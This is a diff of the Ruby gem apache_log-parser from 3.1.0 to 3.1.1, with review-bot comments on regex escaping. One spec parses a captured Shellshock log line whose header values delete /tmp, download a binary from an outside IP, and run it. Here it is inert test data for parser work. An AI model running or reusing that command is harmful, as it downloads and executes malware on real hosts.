apache_log-parser 3.1.0 → 3.1.1
- checksums.yaml +4 -4
- data/lib/apache_log/parser/version.rb +1 -1
- data/lib/apache_log/parser.rb +2 -2
- data/spec/apache_log/parser_spec.rb +19 -0
- metadata +2 -2
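--- a/checksums.yaml
+++ b/checksums.yaml
@@ -1,7 +1,7 @@
 ---
 SHA1:
-metadata.gz:
-data.tar.gz:
+metadata.gz: 059d6f42a9d78d8cfdb3b4245dc5bb7038b52e6b
+data.tar.gz: 9843f3196f886414b7c7ee784669b0b26b367c6e
 SHA512:
-metadata.gz:
-data.tar.gz:
+metadata.gz: 0e54be8c7eee30b4d7abdc5fea023f9c88cd8917d2ff472ea74d6214bf8919f8c68a3915d8eb561de3e1d09da4300f1dd63fdd90e7a6883024f02308e42223d0
+data.tar.gz: 577b92735e5c908b20953bfc2729777489b5f58e72517054d39674498926bf630f37559d1c595f126b4b3eba9ce467515de0f3a17c2dfe9ff3399de039873786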
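--- a/data/lib/apache_log/parser.rb
+++ b/data/lib/apache_log/parser.rb
@@ -7,8 +7,8 @@ module ApacheLog
 common_fields = %w(remote_host identity_check user datetime request status size)
 combined_fields = common_fields + %w(referer user_agent)
 
-common_pattern = '(
-combined_pattern = common_pattern + '\s+"([
+common_pattern = '(?:^|\s)((?:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})|(?:[\w:]+?))\s+(\S+)\s+(\S+)\s+\[(\d{2}\/.*\d{4}:\d{2}:\d{2}:\d{2}\s.*)\]\s+"(.*?)"\s+(\S+)\s+(\S+)'
+combined_pattern = common_pattern + '\s+"(.*?[^\\\\])"\s+"(.*?[^\\\\])"'
 additional_pattern = ''
 
 additional_fields.each do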
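Review bot: The closing quote of the referer and user-agent fields in the new `combined_pattern` is found by checking only the single character before it (`(.*?[^\\\\])"`), which leaves two boundary cases open in fields a client controls. An empty value logged as `""` can no longer match, because the group needs at least one character, and a value that ends in an escaped backslash (`\\` directly before the closing quote, assuming Apache's usual escaping of `\` and `"`) is read as an escaped quote, so the field boundary moves into the next field. The request field in `common_pattern` still uses `"(.*?)"` and relies on backtracking rather than on any escape handling. Consuming escape pairs explicitly covers these cases, e.g. `combined_pattern = common_pattern + '\s+"((?:[^"\\\\]|\\\\.)*)"\s+"((?:[^"\\\\]|\\\\.)*)"'`. The enclosing method starts and ends outside this hunk, so how the pattern is anchored and compiled is not visible here.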
@@ -16,6 +16,15 @@ describe ApacheLog::Parser do
|
|
16
16
|
expect(entity).to eq(expect)
|
17
17
|
end
|
18
18
|
|
19
|
+
it 'can parse ipv6 common format log' do
|
20
|
+
line = '::1 - - [20/May/2014:20:04:04 +0900] "GET /test/indx.html HTTP/1.1" 200 4576'
|
21
|
+
parser = ApacheLog::Parser.new('common')
|
22
|
+
entity = parser.parse(line.chomp)
|
23
|
+
expect = {remote_host: '::1', identity_check: '-', user: '-', datetime: DateTime.new(2014, 5, 20, 20, 04, 04, 0.375),
|
24
|
+
request: {method: 'GET', path: '/test/indx.html', protocol: 'HTTP/1.1'}, status: '200', size: '4576'}
|
25
|
+
expect(entity).to eq(expect)
|
26
|
+
end
|
27
|
+
|
19
28
|
it 'can parse tab separated common format log' do
|
20
29
|
line = "192.168.0.1\t-\t-\t[07/Feb/2011:10:59:59 +0900]\t\"GET /x/i.cgi/net/0000/ HTTP/1.1\"\t200\t9891";
|
21
30
|
parser = ApacheLog::Parser.new('common')
|
@@ -45,6 +54,16 @@ describe ApacheLog::Parser do
|
|
45
54
|
expect(entity).to eq(expect)
|
46
55
|
end
|
47
56
|
|
57
|
+
it 'can parse attack log' do
|
58
|
+
line = '121.207.230.74 - - [13/Apr/2015:08:21:54 +0900] "GET / HTTP/1.1" 200 2392 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-orwj >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-orwj >> /tmp/Run.sh;echo /tmp/China.Z-orwj >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-orwj >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-orwj >> /tmp/Run.sh;echo /tmp/China.Z-orwj >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""'
|
59
|
+
parser = ApacheLog::Parser.new('combined')
|
60
|
+
entity = parser.parse(line.chomp)
|
61
|
+
expect = {remote_host: '121.207.230.74', identity_check: '-', user: '-', datetime: DateTime.new(2015, 4, 13, 8,21,54, 0.375),
|
62
|
+
request: {method: 'GET', path: '/', protocol: 'HTTP/1.1' }, status: '200', size: '2392', referer: '() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-orwj >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-orwj >> /tmp/Run.sh;echo /tmp/China.Z-orwj >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"',
|
63
|
+
user_agent: '() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-orwj >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-orwj >> /tmp/Run.sh;echo /tmp/China.Z-orwj >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"'}
|
64
|
+
expect(entity).to eq(expect)
|
65
|
+
end
|
66
|
+
|
48
67
|
it 'can parse tab separated combined format log' do
|
49
68
|
line = "192.168.0.1\t-\t-\t[07/Feb/2011:10:59:59 +0900]\t\"GET /x/i.cgi/movie/0001/-0002 HTTP/1.1\"\t200\t14462\t\"-\"\t\"DoCoMo/2.0 F08A3(c500;TB;W30H20)\"";
|
50
69
|
parser = ApacheLog::Parser.new('combined')
|
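Review bot: The new 'can parse attack log' example does not say what it pins down: the fixture is a Shellshock-style `() { :; };` header value kept as inert string data, and the property under test is that escaped quotes (`\"`) inside referer and user agent stay within one field. A comment above the example such as `# Regression: \" inside referer/user_agent must not end the field; the payload is fixture data and is only matched by the regex.` would make that clear to the next reader. Because both the input line and the expected hash are single-quoted, the parsed values still carry the backslash escapes, which is worth stating for consumers that display or forward them. The added examples also have no case for an empty `""` value or for a value ending in a backslash, the two inputs where a one-character check before the closing quote is most likely to misplace the field boundary.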
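--- a/metadata
+++ b/metadata
@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: apache_log-parser
 version: !ruby/object:Gem::Version
-version: 3.1.
+version: 3.1.1
 platform: ruby
 authors:
 - Yuichi Takada
 autorequire:
 bindir: bin
 cert_chain: []
-date: 2015-
+date: 2015-04-18 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
 name: bundler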